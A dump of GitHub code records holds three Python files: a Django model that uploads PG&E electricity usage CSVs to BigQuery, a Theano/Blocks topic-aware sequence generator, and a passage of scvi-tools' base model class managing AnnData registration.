generic FileField instead.\n\n \"\"\"\n file = models.FileField(upload_to=\"pictures\")\n slug = models.SlugField(max_length=50, blank=True)\n\n def __str__(self):\n return self.file.name\n\n @models.permalink\n def get_absolute_url(self):\n return ('upload-new', )\n\n def save(self, *args, **kwargs):\n self.slug = self.file.name\n super(Picture, self).save(*args, **kwargs)\n print(\"Uploading data to BIG Query\")\n self.upload_to_big_query(os.path.join( BASE_DIR, MEDIA_ROOT, self.file.name))\n\n def delete(self, *args, **kwargs):\n \"\"\"delete -- Remove to leave file.\"\"\"\n self.file.delete(False)\n super(Picture, self).delete(*args, **kwargs)\n\n def parse_file(self, file_path):\n data_rows = []\n with open(file_path, 'rb') as csvfile:\n r = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in r:\n if len(row) == 7 and \"Electric usage\" in row[0]:\n row_item = {}\n row_item[\"zip\"] = zipcode\n row_item[\"type\"] = row[0]\n row_item[\"date\"] = row[1]\n row_item[\"start\"] = row[2]\n row_item[\"end\"] = row[3]\n row_item[\"usage\"] = row[4]\n row_item[\"units\"] = row[5]\n data_rows.append(json.loads(json.dumps(row_item)))\n elif \"Address\" in row:\n zipcode = self.get_zipcode(row)\n return data_rows\n\n def get_zipcode(self, address):\n return address[-1].split()[1].strip('\\\"')\n\n def upload_to_big_query(self, file_path):\n # DO CSV Stuff for content\n rows = self.parse_file(file_path)\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(\"gbd_store\")\n table_ref = dataset_ref.table(\"pge_electric\")\n table = bigquery_client.get_table(table_ref)\n errors = bigquery_client.create_rows(table, rows)\n if not errors:\n print(\"Successfully uploaded data to big query\")\n else:\n print(\"ERRORS:\")\n print(errors)\n","repo_name":"supriya-premkumar/GreenButtonData","sub_path":"fileupload/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70020025514","text":"from theano import tensor\r\n\r\nfrom blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\r\nfrom blocks.bricks.base import application, Brick, lazy\r\nfrom blocks.bricks.parallel import Fork, Merge\r\nfrom blocks.bricks.lookup import LookupTable\r\nfrom blocks.bricks.recurrent import recurrent\r\nfrom blocks.roles import add_role, COST\r\nfrom blocks.utils import dict_union, dict_subset\r\nfrom blocks.bricks.sequence_generators import (\r\n BaseSequenceGenerator, FakeAttentionRecurrent)\r\nfrom attention_with_topicalq import AttentionRecurrent\r\n\r\nfrom blocks.bricks.wrappers import WithExtraDims\r\n\r\nclass PickTargetProb(Brick):\r\n \"\"\"A softmax brick.\r\n\r\n Works with 2-dimensional inputs only. If you need more,\r\n see :class:`NDimensionalSoftmax`.\r\n \"\"\"\r\n\r\n @application(inputs=['y', 'x'], outputs=['cost'])\r\n def apply(self, application_call, y, x):\r\n if y.ndim == x.ndim - 1:\r\n print(\"y.ndim == x.ndim - 1\");\r\n indices = tensor.arange(y.shape[0]) * x.shape[1] + y\r\n cost = x.flatten()[indices]\r\n else:\r\n raise TypeError('rank mismatch between x and y')\r\n return cost\r\n\r\n\r\nclass NDPickTargetProb(PickTargetProb):\r\n decorators = [WithExtraDims()]\r\n\r\nclass SelectTarget(Random):\r\n\r\n @application\r\n def emit(self, probs):\r\n batch_size = probs.shape[0]\r\n pvals_flat = probs.reshape((batch_size, -1))\r\n generated = self.theano_rng.multinomial(pvals=pvals_flat)\r\n return generated.reshape(probs.shape).argmax(axis=-1)\r\n\r\n @application\r\n def cost(self, y,x):\r\n indices = tensor.arange(y.shape[0]) * x.shape[1] + y\r\n cost = x.flatten()[indices]\r\n\r\n return cost\r\n\r\n\r\nclass SequenceGenerator(BaseSequenceGenerator):\r\n r\"\"\"A more user-friendly interface for :class:`BaseSequenceGenerator`.\r\n\r\n Parameters\r\n ----------\r\n readout : instance of :class:`AbstractReadout`\r\n The readout component for the sequence generator.\r\n transition : instance of :class:`.BaseRecurrent`\r\n The recurrent transition to be used in the sequence generator.\r\n Will be combined with `attention`, if that one is given.\r\n attention : object, optional\r\n The attention mechanism to be added to ``transition``,\r\n an instance of\r\n :class:`~blocks.bricks.attention.AbstractAttention`.\r\n add_contexts : bool\r\n If ``True``, the\r\n :class:`.AttentionRecurrent` wrapping the\r\n `transition` will add additional contexts for the attended and its\r\n mask.\r\n \\*\\*kwargs : dict\r\n All keywords arguments are passed to the base class. If `fork`\r\n keyword argument is not provided, :class:`.Fork` is created\r\n that forks all transition sequential inputs without a \"mask\"\r\n substring in them.\r\n\r\n \"\"\"\r\n def __init__(self, readout,topicWordReadout,topic_vector_names, transition,topical_name,content_name,q_dim,q_name, attention=None,topical_attention=None,\r\n use_step_decay_cost=False,\r\n use_doubly_stochastic=False, lambda_ds=0.001,\r\n use_concentration_cost=False, lambda_ct=10,\r\n use_stablilizer=False, lambda_st=50,\r\n add_contexts=True, **kwargs):\r\n self.use_doubly_stochastic = use_doubly_stochastic\r\n self.use_step_decay_cost = use_step_decay_cost\r\n self.use_concentration_cost = use_concentration_cost\r\n self.use_stablilizer = use_stablilizer\r\n self.lambda_ds = lambda_ds\r\n self.lambda_ct = lambda_ct\r\n self.lambda_st = lambda_st\r\n normal_inputs = [name for name in transition.apply.sequences\r\n if 'mask' not in name]\r\n kwargs.setdefault('fork', Fork(normal_inputs))\r\n if attention:\r\n transition = AttentionRecurrent(\r\n transition, attention,topical_attention,topical_attended_name='topical_attended',topical_attended_mask_name='topical_attended_mask',content_name=content_name,topical_name=topical_name,\r\n add_contexts=add_contexts, name=\"att_trans\")\r\n else:\r\n transition = FakeAttentionRecurrent(transition,\r\n name=\"with_fake_attention\")\r\n\r\n self.topicWordReadout=topicWordReadout;\r\n self._topic_vector_names=topic_vector_names;\r\n self.probPick=NDPickTargetProb();\r\n self.sampleTarget=SelectTarget();\r\n #self._q_names=[q_name];\r\n self.topical_name=topical_name;\r\n self.content_name=content_name;\r\n self._topical_context_names=['topical_attended','topical_attended_mask'];\r\n super(SequenceGenerator, self).__init__(\r\n readout, transition, **kwargs)\r\n self.children+=[self.topicWordReadout,self.probPick,self.sampleTarget];\r\n\r\n def _push_allocation_config(self):\r\n\r\n super(SequenceGenerator, self)._push_allocation_config();\r\n transition_sources = (self._state_names + self._context_names +\r\n self._glimpse_names)\r\n self.topicWordReadout.source_dims = [self.transition.get_dim(name)\r\n if name in transition_sources\r\n else self.readout.get_dim(name)\r\n for name in self.readout.source_names]\r\n self.topicWordReadout.push_allocation_config()\r\n\r\n @application\r\n def cost_matrix(self, application_call, outputs,tw_outputs, tw_binary,mask=None, **kwargs):\r\n \"\"\"Returns generation costs for output sequences.\r\n\r\n See Also\r\n --------\r\n :meth:`cost` : Scalar cost.\r\n\r\n \"\"\"\r\n # We assume the data has axes (time, batch, features, ...)\r\n batch_size = outputs.shape[1]\r\n\r\n # Prepare input for the iterative part\r\n states = dict_subset(kwargs, self._state_names, must_have=False)\r\n # masks in context are optional (e.g. `attended_mask`)\r\n contexts = dict_subset(kwargs, self._context_names, must_have=False)\r\n topical_word_contexts=dict_subset(kwargs, self._topical_context_names)\r\n topical_embeddings=dict_subset(kwargs,[self.topical_name]);\r\n content_embeddings=dict_subset(kwargs,[self.content_name]);\r\n #q=dict_subset(kwargs, self._q_names, must_have=True,pop=True);\r\n feedback = self.readout.feedback(outputs)\r\n inputs = self.fork.apply(feedback, as_dict=True)\r\n\r\n # Run the recurrent network\r\n results = self.transition.apply(\r\n mask=mask, return_initial_states=True, as_dict=True,\r\n **dict_union(inputs, states, contexts,topical_word_contexts,topical_embeddings,content_embeddings))\r\n\r\n # Separate the deliverables. The last states are discarded: they\r\n # are not used to predict any output symbol. The initial glimpses\r\n # are discarded because they are not used for prediction.\r\n # Remember, glimpses are computed _before_ output stage, states are\r\n # computed after.\r\n states = {name: results[name][:-1] for name in self._state_names}\r\n glimpses = {name: results[name][1:] for name in self._glimpse_names}\r\n glimpses_modified={'weighted_averages':glimpses['weighted_averages'],'weigths':glimpses['weights']}\r\n\r\n # Compute the cost\r\n feedback = tensor.roll(feedback, 1, 0)\r\n feedback = tensor.set_subtensor(\r\n feedback[0],\r\n self.readout.feedback(self.readout.initial_outputs(batch_size)))\r\n readouts = self.readout.readout(\r\n feedback=feedback, **dict_union(states, glimpses_modified, contexts))\r\n #costs = self.readout.cost(readouts, outputs)\r\n\r\n #topicSumVec = dict_subset(kwargs, self._topic_vector_names, must_have=True);\r\n twReadouts=self.topicWordReadout.readout(feedback=feedback,**dict_union(states,glimpses_modified, contexts));\r\n twExp=tensor.exp(twReadouts);\r\n rwExp=tensor.exp(readouts);\r\n Z=twExp.sum(keepdims=True,axis=2)+rwExp.sum(keepdims=True,axis=2);#remains uncertain,keepdims, and the # of axis\r\n twExp/=Z;\r\n rwExp/=Z;\r\n twCost=self.probPick.apply(tw_outputs,twExp,extra_ndim=twExp.ndim - 2);\r\n rwCost=self.probPick.apply(outputs,rwExp,extra_ndim=rwExp.ndim - 2);\r\n totalCost=twCost*tw_binary+rwCost;\r\n costs=-tensor.log(totalCost);\r\n\r\n if self.use_doubly_stochastic:\r\n # Doubly stochastic cost\r\n # \\lambda\\sum_{i}(1-\\sum_{t}w_{t, i})^2\r\n # the first dimensions of weights returned by transition\r\n # is batch, time\r\n weights = glimpses['weights']\r\n weights_sum_time = tensor.sum(weights, 0)\r\n penalties = tensor.ones_like(weights_sum_time) - weights_sum_time\r\n penalties_squared = tensor.pow(penalties, 2)\r\n ds_costs = tensor.sum(penalties_squared, 1)\r\n costs += (self.lambda_ds * ds_costs)[None, :]\r\n\r\n def step_decay_cost(states):\r\n # shape is time, batch, features\r\n eta = 0.0001\r\n xi = 100\r\n states_norm = states.norm(2, axis=2)\r\n zz = tensor.zeros([1, states.shape[1]])\r\n padded_norm = tensor.join(0, zz, states_norm)[:-1, :]\r\n diffs = states_norm - padded_norm\r\n costs = eta * (xi ** diffs)\r\n return costs\r\n\r\n if self.use_step_decay_cost:\r\n costs += step_decay_cost(states['states'])\r\n\r\n def stablilizer_cost(states):\r\n states_norm = states.norm(2, axis=2)\r\n zz = tensor.zeros([1, states.shape[1]])\r\n padded_norm = tensor.join(0, zz, states_norm)[:-1, :]\r\n diffs = states_norm - padded_norm\r\n costs = tensor.pow(diffs, 2)\r\n return costs\r\n\r\n if self.use_stablilizer:\r\n costs += self.lambda_st * stablilizer_cost(states['states'])\r\n\r\n if self.use_concentration_cost:\r\n # weights has shape [batch, time, source sentence len]\r\n weights = glimpses['weights']\r\n maxis = tensor.max(weights, axis=2)\r\n lacks = tensor.ones_like(maxis) - maxis\r\n costs += self.lambda_ct * lacks\r\n\r\n if mask is not None:\r\n costs *= mask\r\n\r\n for name, variable in list(glimpses.items()) + list(states.items()):\r\n application_call.add_auxiliary_variable(\r\n variable.copy(), name=name)\r\n\r\n # This variables can be used to initialize the initial states of the\r\n # next batch using the last states of the current batch.\r\n for name in self._state_names:\r\n application_call.add_auxiliary_variable(\r\n results[name][-1].copy(), name=name+\"_final_value\")\r\n\r\n return costs\r\n\r\n\r\n @recurrent\r\n def generate(self, outputs,tw_vocab_overlap, **kwargs):\r\n \"\"\"A sequence generation step.\r\n\r\n Parameters\r\n ----------\r\n outputs : :class:`~tensor.TensorVariable`\r\n The outputs from the previous step.\r\n\r\n Notes\r\n -----\r\n The contexts, previous states and glimpses are expected as keyword\r\n arguments.\r\n\r\n \"\"\"\r\n states = dict_subset(kwargs, self._state_names)\r\n # masks in context are optional (e.g. `attended_mask`)\r\n contexts = dict_subset(kwargs, self._context_names, must_have=False)\r\n topical_word_contexts=dict_subset(kwargs, self._topical_context_names)\r\n topical_embeddings=dict_subset(kwargs,[self.topical_name]);\r\n content_embeddings=dict_subset(kwargs,[self.content_name]);\r\n glimpses = dict_subset(kwargs, self._glimpse_names)\r\n next_glimpses = self.transition.take_glimpses(\r\n as_dict=True,\r\n **dict_union(\r\n states, glimpses,topical_embeddings,content_embeddings,contexts,topical_word_contexts));\r\n glimpses_modified={'weighted_averages':next_glimpses['weighted_averages'],'weigths':next_glimpses['weights']}\r\n next_readouts = self.readout.readout(\r\n feedback=self.readout.feedback(outputs),\r\n **dict_union(states, glimpses_modified, contexts))\r\n next_tw_readouts=self.topicWordReadout.readout(\r\n feedback=self.readout.feedback(outputs),\r\n **dict_union(states, glimpses_modified, contexts))\r\n twExp=tensor.exp(next_tw_readouts);\r\n rwExp=tensor.exp(next_readouts);\r\n Z=twExp.sum(keepdims=True,axis=1)+rwExp.sum(keepdims=True,axis=1);#remains uncertain,keepdims, and the # of axis\r\n twExp/=Z;\r\n rwExp/=Z;\r\n probs=tensor.dot(twExp,tw_vocab_overlap)+rwExp;\r\n next_outputs = self.sampleTarget.emit(probs);\r\n next_costs = self.sampleTarget.cost(next_outputs, probs)\r\n next_costs=-tensor.log(next_costs);\r\n next_feedback = self.readout.feedback(next_outputs)\r\n next_inputs = (self.fork.apply(next_feedback, as_dict=True)\r\n if self.fork else {'feedback': next_feedback})\r\n next_states = self.transition.compute_states(\r\n as_list=True,\r\n **dict_union(next_inputs, states, next_glimpses, contexts,topical_word_contexts))\r\n return (next_states + [next_outputs] +\r\n list(next_glimpses.values()) + [next_costs])\r\n\r\n @generate.delegate\r\n def generate_delegate(self):\r\n return self.transition.apply\r\n\r\n @generate.property('states')\r\n def generate_states(self):\r\n return self._state_names + ['outputs'] + self._glimpse_names\r\n\r\n @generate.property('outputs')\r\n def generate_outputs(self):\r\n return (self._state_names + ['outputs'] +\r\n self._glimpse_names + ['costs'])\r\n\r\n @generate.property('contexts')\r\n def generate_contexts(self):\r\n return (self.transition.apply.contexts++self._topical_context_names+[self.content_name]+[self.topical_name]\r\n +['tw_vocab_overlap'])\r\n\r\n def get_dim(self, name):\r\n if name in (self._state_names + self._context_names +\r\n self._glimpse_names):\r\n return self.transition.get_dim(name)\r\n elif name == 'outputs':\r\n return self.readout.get_dim(name)\r\n return super(BaseSequenceGenerator, self).get_dim(name)\r\n\r\n @application\r\n def initial_states(self, batch_size, *args, **kwargs):\r\n # TODO: support dict of outputs for application methods\r\n # to simplify this code.\r\n state_dict = dict(\r\n self.transition.initial_states(\r\n batch_size, as_dict=True, *args, **kwargs),\r\n outputs=self.readout.initial_outputs(batch_size))\r\n return [state_dict[state_name]\r\n for state_name in self.generate.states]\r\n\r\n @initial_states.property('outputs')\r\n def initial_states_outputs(self):\r\n return self.generate.states\r\n","repo_name":"LynetteXing1991/TA-Seq2Seq","sub_path":"SequenceGenerator_forPickTopicWord.py","file_name":"SequenceGenerator_forPickTopicWord.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"72"} +{"seq_id":"33068761021","text":"from __future__ import annotations\n\nimport inspect\nimport logging\nimport os\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nfrom collections.abc import Sequence\nfrom uuid import uuid4\n\nimport numpy as np\nimport rich\nimport torch\nfrom anndata import AnnData\nfrom mudata import MuData\n\nfrom scvi import REGISTRY_KEYS, settings\nfrom scvi._types import AnnOrMuData, MinifiedDataType\nfrom scvi.autotune._types import TunableMixin\nfrom scvi.data import AnnDataManager\nfrom scvi.data._compat import registry_from_setup_dict\nfrom scvi.data._constants import (\n _MODEL_NAME_KEY,\n _SCVI_UUID_KEY,\n _SETUP_ARGS_KEY,\n _SETUP_METHOD_NAME,\n)\nfrom scvi.data._utils import _assign_adata_uuid, _check_if_view, _get_adata_minify_type\nfrom scvi.dataloaders import AnnDataLoader\nfrom scvi.model._utils import parse_device_args\nfrom scvi.model.base._utils import _load_legacy_saved_files\nfrom scvi.utils import attrdict, setup_anndata_dsp\nfrom scvi.utils._docstrings import devices_dsp\n\nfrom ._utils import _initialize_model, _load_saved_files, _validate_var_names\n\nlogger = logging.getLogger(__name__)\n\n\n_UNTRAINED_WARNING_MESSAGE = \"Trying to query inferred values from an untrained model. Please train the model first.\"\n\n_SETUP_INPUTS_EXCLUDED_PARAMS = {\"adata\", \"mdata\", \"kwargs\"}\n\n\nclass BaseModelMetaClass(ABCMeta):\n \"\"\"Metaclass for :class:`~scvi.model.base.BaseModelClass`.\n\n Constructs model class-specific mappings for :class:`~scvi.data.AnnDataManager` instances.\n ``cls._setup_adata_manager_store`` maps from AnnData object UUIDs to :class:`~scvi.data.AnnDataManager` instances.\n This mapping is populated everytime ``cls.setup_anndata()`` is called.\n ``cls._per_isntance_manager_store`` maps from model instance UUIDs to AnnData UUID::class:`~scvi.data.AnnDataManager` mappings.\n These :class:`~scvi.data.AnnDataManager` instances are tied to a single model instance and populated either\n during model initialization or after running ``self._validate_anndata()``.\n \"\"\"\n\n @abstractmethod\n def __init__(cls, name, bases, dct):\n cls._setup_adata_manager_store: dict[\n str, type[AnnDataManager]\n ] = {} # Maps adata id to AnnDataManager instances.\n cls._per_instance_manager_store: dict[\n str, dict[str, type[AnnDataManager]]\n ] = {} # Maps model instance id to AnnDataManager mappings.\n super().__init__(name, bases, dct)\n\n\nclass BaseModelClass(TunableMixin, metaclass=BaseModelMetaClass):\n \"\"\"Abstract class for scvi-tools models.\n\n Notes\n -----\n See further usage examples in the following tutorials:\n\n 1. :doc:`/tutorials/notebooks/dev/model_user_guide`\n \"\"\"\n\n _data_loader_cls = AnnDataLoader\n\n def __init__(self, adata: AnnOrMuData | None = None):\n # check if the given adata is minified and check if the model being created\n # supports minified-data mode (i.e. inherits from the abstract BaseMinifiedModeModelClass).\n # If not, raise an error to inform the user of the lack of minified-data functionality\n # for this model\n data_is_minified = (\n adata is not None and _get_adata_minify_type(adata) is not None\n )\n if data_is_minified and not issubclass(type(self), BaseMinifiedModeModelClass):\n raise NotImplementedError(\n f\"The {type(self).__name__} model currently does not support minified data.\"\n )\n self.id = str(uuid4()) # Used for cls._manager_store keys.\n if adata is not None:\n self._adata = adata\n self._adata_manager = self._get_most_recent_anndata_manager(\n adata, required=True\n )\n self._register_manager_for_instance(self.adata_manager)\n # Suffix registry instance variable with _ to include it when saving the model.\n self.registry_ = self._adata_manager.registry\n self.summary_stats = self._adata_manager.summary_stats\n\n self.is_trained_ = False\n self._model_summary_string = \"\"\n self.train_indices_ = None\n self.test_indices_ = None\n self.validation_indices_ = None\n self.history_ = None\n\n @property\n def adata(self) -> AnnOrMuData:\n \"\"\"Data attached to model instance.\"\"\"\n return self._adata\n\n @adata.setter\n def adata(self, adata: AnnOrMuData):\n if adata is None:\n raise ValueError(\"adata cannot be None.\")\n self._validate_anndata(adata)\n self._adata = adata\n self._adata_manager = self.get_anndata_manager(adata, required=True)\n self.registry_ = self._adata_manager.registry\n self.summary_stats = self._adata_manager.summary_stats\n\n @property\n def adata_manager(self) -> AnnDataManager:\n \"\"\"Manager instance associated with self.adata.\"\"\"\n return self._adata_manager\n\n def to_device(self, device: str | int):\n \"\"\"Move model to device.\n\n Parameters\n ----------\n device\n Device to move model to. Options: 'cpu' for CPU, integer GPU index (eg. 0),\n or 'cuda:X' where X is the GPU index (eg. 'cuda:0'). See torch.device for more info.\n\n Examples\n --------\n >>> adata = scvi.data.synthetic_iid()\n >>> model = scvi.model.SCVI(adata)\n >>> model.to_device('cpu') # moves model to CPU\n >>> model.to_device('cuda:0') # moves model to GPU 0\n >>> model.to_device(0) # also moves model to GPU 0\n \"\"\"\n my_device = torch.device(device)\n self.module.to(my_device)\n\n @property\n def device(self) -> str:\n \"\"\"The current device that the module's params are on.\"\"\"\n return self.module.device\n\n @staticmethod\n def _get_setup_method_args(**setup_locals) -> dict:\n \"\"\"Returns a dictionary organizing the arguments used to call ``setup_anndata``.\n\n Must be called with ``**locals()`` at the start of the ``setup_anndata`` method\n to avoid the inclusion of any extraneous variables.\n \"\"\"\n cls = setup_locals.pop(\"cls\")\n method_name = None\n if \"adata\" in setup_locals:\n method_name = \"setup_anndata\"\n elif \"mdata\" in setup_locals:\n method_name = \"setup_mudata\"\n\n model_name = cls.__name__\n setup_args = {}\n for k, v in setup_locals.items():\n if k not in _SETUP_INPUTS_EXCLUDED_PARAMS:\n setup_args[k] = v\n return {\n _MODEL_NAME_KEY: model_name,\n _SETUP_METHOD_NAME: method_name,\n _SETUP_ARGS_KEY: setup_args,\n }\n\n @staticmethod\n def _create_modalities_attr_dict(\n modalities: dict[str, str], setup_method_args: dict\n ) -> attrdict:\n \"\"\"Preprocesses a ``modalities`` dictionary used in ``setup_mudata()`` to map modality names.\n\n Ensures each field key has a respective modality key, defaulting to ``None``.\n Raises a ``UserWarning`` if extraneous modality mappings are detected.\n\n Parameters\n ----------\n modalities\n Dictionary mapping ``setup_mudata()`` argument name to modality name.\n setup_method_args\n Output of ``_get_setup_method_args()``.\n \"\"\"\n setup_args = setup_method_args[_SETUP_ARGS_KEY]\n filtered_modalities = {\n arg_name: modalities.get(arg_name, None) for arg_name in setup_args.keys()\n }\n extra_modalities = set(modalities) - set(filtered_modalities)\n if len(extra_modalities) > 0:\n raise ValueError(\n f\"Extraneous modality mapping(s) detected: {extra_modalities}\"\n )\n return attrdict(filtered_modalities)\n\n @classmethod\n def register_manager(cls, adata_manager: AnnDataManager):\n \"\"\"Registers an :class:`~scvi.data.AnnDataManager` instance with this model class.\n\n Stores the :class:`~scvi.data.AnnDataManager` reference in a class-specific manager store.\n Intended for use in the ``setup_anndata()`` class method followed up by retrieval of the\n :class:`~scvi.data.AnnDataManager` via the ``_get_most_recent_anndata_manager()`` method in\n the model init method.\n\n Notes\n -----\n Subsequent calls to this method with an :class:`~scvi.data.AnnDataManager` instance referring to the same\n underlying AnnData object will overwrite the reference to previous :class:`~scvi.data.AnnDataManager`.\n \"\"\"\n adata_id = adata_manager.adata_uuid\n cls._setup_adata_manager_store[adata_id] = adata_manager\n\n def _register_manager_for_instance(self, adata_manager: AnnDataManager):\n \"\"\"Registers an :class:`~scvi.data.AnnDataManager` instance with this model instance.\n\n Creates a model-instance specific mapping in ``cls._per_instance_manager_store`` for this\n :class:`~scvi.data.AnnDataManager` instance.\n \"\"\"\n if self.id not in self._per_instance_manager_store:\n self._per_instance_manager_store[self.id] = {}\n\n adata_id = adata_manager.adata_uuid\n instance_manager_store = self._per_instance_manager_store[self.id]\n instance_manager_store[adata_id] = adata_manager\n\n def deregister_manager(self, adata: AnnData | None = None):\n \"\"\"Deregisters the :class:`~scvi.data.AnnDataManager` instance associated with `adata`.\n\n If `adata` is `None`, deregisters all :class:`~scvi.data.AnnDataManager` instances\n in both the class and instance-specific manager stores, except for the one associated\n with this model instance.\n \"\"\"\n cls_manager_store = self._setup_adata_manager_store\n instance_manager_store = self._per_instance_manager_store[self.id]\n\n if adata is None:\n instance_managers_to_clear = list(instance_manager_store.keys())\n cls_managers_to_clear = list(cls_manager_store.keys())\n else:\n adata_manager = self._get_most_recent_anndata_manager(adata, required=True)\n cls_managers_to_clear = [adata_manager.adata_uuid]\n instance_managers_to_clear = [adata_manager.adata_uuid]\n\n for adata_id in cls_managers_to_clear:\n # don't clear the current manager by default\n is_current_adata = (\n adata is None and adata_id == self.adata_manager.adata_uuid\n )\n if is_current_adata or adata_id not in cls_manager_store:\n continue\n del cls_manager_store[adata_id]\n\n for adata_id in instance_managers_to_clear:\n # don't clear the current manager by default\n is_current_adata = (\n adata is None and adata_id == self.adata_manager.adata_uuid\n )\n if is_current_adata or adata_id not in instance_manager_store:\n continue\n del instance_manager_store[adata_id]\n\n @classmethod\n def _get_most_recent_anndata_manager(\n cls, adata: AnnOrMuData, required: bool = False\n ) -> AnnDataManager | None:\n \"\"\"Retrieves the :class:`~scvi.data.AnnDataManager` for a given AnnData object specific to this model class.\n\n Checks for the most recent :class:`~scvi.data.AnnDataManager` created for the given AnnData object via\n ``setup_anndata()`` on model initialization. Unlike :meth:`scvi.model.base.BaseModelClass.get_anndata_manager`,\n this method is not model instance specific and can be called before a model is fully initialized.\n\n Parameters\n ----------\n adata\n AnnData object to find manager instance for.\n required\n If True, errors on missing manager. Otherwise, returns None when manager is missing.\n \"\"\"\n if _SCVI_UUID_KEY not in adata.uns:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first.\"\n )\n return None\n\n adata_id = adata.uns[_SCVI_UUID_KEY]\n\n if adata_id not in cls._setup_adata_manager_store:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first. \"\n \"It appears the AnnData object has been setup with a different model.\"\n )\n return None\n\n adata_manager = cls._setup_adata_manager_store[adata_id]\n if adata_manager.adata is not adata:\n raise ValueError(\n \"The provided AnnData object does not match the AnnData object \"\n \"previously provided for setup. Did you make a copy?\"\n )\n\n return adata_manager\n\n def get_anndata_manager(\n self, adata: AnnOrMuData, required: bool = False\n ) -> AnnDataManager | None:\n \"\"\"Retrieves the :class:`~scvi.data.AnnDataManager` for a given AnnData object specific to this model instance.\n\n Requires ``self.id`` has been set. Checks for an :class:`~scvi.data.AnnDataManager`\n specific to this model instance.\n\n Parameters\n ----------\n adata\n AnnData object to find manager instance for.\n required\n If True, errors on missing manager. Otherwise, returns None when manager is missing.\n \"\"\"\n cls = self.__class__\n if _SCVI_UUID_KEY not in adata.uns:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first.\"\n )\n return None\n\n adata_id = adata.uns[_SCVI_UUID_KEY]\n if self.id not in cls._per_instance_manager_store:\n if required:\n raise AssertionError(\n \"Unable to find instance specific manager store. \"\n \"The model has likely not been initialized with an AnnData object.\"\n )\n return None\n elif adata_id not in cls._per_instance_manager_store[self.id]:\n if required:\n raise AssertionError(\n \"Please call ``self._validate_anndata`` on this AnnData object.\"\n )\n return None\n\n adata_manager = cls._per_instance_manager_store[self.id][adata_id]\n if adata_manager.adata is not adata:\n logger.info(\n \"AnnData object appears to be a copy. Attempting to transfer setup.\"\n )\n _assign_adata_uuid(adata, overwrite=True)\n adata_manager = self.adata_manager.transfer_fields(adata)\n self._register_manager_for_instance(adata_manager)\n\n return adata_manager\n\n def get_from_registry(\n self,\n adata: AnnOrMuData,\n registry_key: str,\n ) -> np.ndarray:\n \"\"\"Returns the object in AnnData associated with the key in the data registry.\n\n AnnData object should be registered with the model prior to calling this function\n via the ``self._validate_anndata`` method.\n\n Parameters\n ----------\n registry_key\n key of object to get from data registry.\n adata\n AnnData to pull data from.\n\n Returns\n -------\n The requested data as a NumPy array.\n \"\"\"\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n raise AssertionError(\n \"AnnData not registered with model. Call `self._validate_anndata` \"\n \"prior to calling this function.\"\n )\n return adata_manager.get_from_registry(registry_key)\n\n def _make_data_loader(\n self,\n adata: AnnOrMuData,\n indices: Sequence[int] | None = None,\n batch_size: int | None = None,\n shuffle: bool = False,\n data_loader_class=None,\n **data_loader_kwargs,\n ):\n \"\"\"Create a AnnDataLoader object for data iteration.\n\n Parameters\n ----------\n adata\n AnnData object with equivalent structure to initial AnnData.\n indices\n Indices of cells in adata to use. If `None`, all cells are used.\n batch_size\n Minibatch size for data loading into model. Defaults to `scvi.settings.batch_size`.\n shuffle\n Whether observations are shuffled each iteration though\n data_loader_class\n Class to use for data loader\n data_loader_kwargs\n Kwargs to the class-specific data loader class\n \"\"\"\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n raise AssertionError(\n \"AnnDataManager not found. Call `self._validate_anndata` prior to calling this function.\"\n )\n\n adata = adata_manager.adata\n\n if batch_size is None:\n batch_size = settings.batch_size\n if indices is None:\n indices = np.arange(adata.n_obs)\n if data_loader_class is None:\n data_loader_class = self._data_loader_cls\n\n if \"num_workers\" not in data_loader_kwargs:\n data_loader_kwargs.update({\"num_workers\": settings.dl_num_workers})\n\n dl = data_loader_class(\n adata_manager,\n shuffle=shuffle,\n indices=indices,\n batch_size=batch_size,\n **data_loader_kwargs,\n )\n return dl\n\n def _validate_anndata(\n self, adata: AnnOrMuData | None = None, copy_if_view: bool = True\n ) -> AnnData:\n \"\"\"Validate anndata has been properly registered, transfer if necessary.\"\"\"\n if adata is None:\n adata = self.adata\n\n _check_if_view(adata, copy_if_view=copy_if_view)\n\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n logger.info(\n \"Input AnnData not setup with scvi-tools. \"\n + \"attempting to transfer AnnData setup\"\n )\n self._register_manager_for_instance(\n self.adata_manager.transfer_fields(adata)\n )\n else:\n # Case where correct AnnDataManager is found, replay registration as necessary.\n adata_manager.validate()\n\n return adata\n\n def _check_if_trained(\n self, warn: bool = True, message: str = _UNTRAINED_WARNING_MESSAGE\n ):\n \"\"\"Check if the model is trained.\n\n If not trained and `warn` is True, raise a warning, else raise a RuntimeError.\n \"\"\"\n if not self.is_trained_:\n if warn:\n warnings.warn(\n message, UserWarning, stacklevel=settings.warnings_stacklevel\n )\n else:\n raise RuntimeError(message)\n\n @property\n def is_trained(self) -> bool:\n \"\"\"Whether the model has been trained.\"\"\"\n return self.is_trained_\n\n @property\n def test_indices(self) -> np.ndarray:\n \"\"\"Observations that are in test set.\"\"\"\n return self.test_indices_\n\n @property\n def train_indices(self) -> np.ndarray:\n \"\"\"Observations that are in train set.\"\"\"\n return self.train_indices_\n\n @property\n def validation_indices(self) -> np.ndarray:\n \"\"\"Observations that are in validation set.\"\"\"\n return self.validation_indices_\n\n @train_indices.setter\n def train_indices(self, value):\n self.train_indices_ = value\n\n @test_indices.setter\n def test_indices(self, value):\n self.test_indices_ = value\n\n @validation_indices.setter\n def validation_indices(self, value):\n self.validation_indices_ = value\n\n @is_trained.setter\n def is_trained(self, value):\n self.is_trained_ = value\n\n @property\n def history(self):\n \"\"\"Returns computed metrics during training.\"\"\"\n return self.history_\n\n def _get_user_attributes(self):\n \"\"\"Returns all the self attributes defined in a model class, e.g., `self.is_trained_`.\"\"\"\n 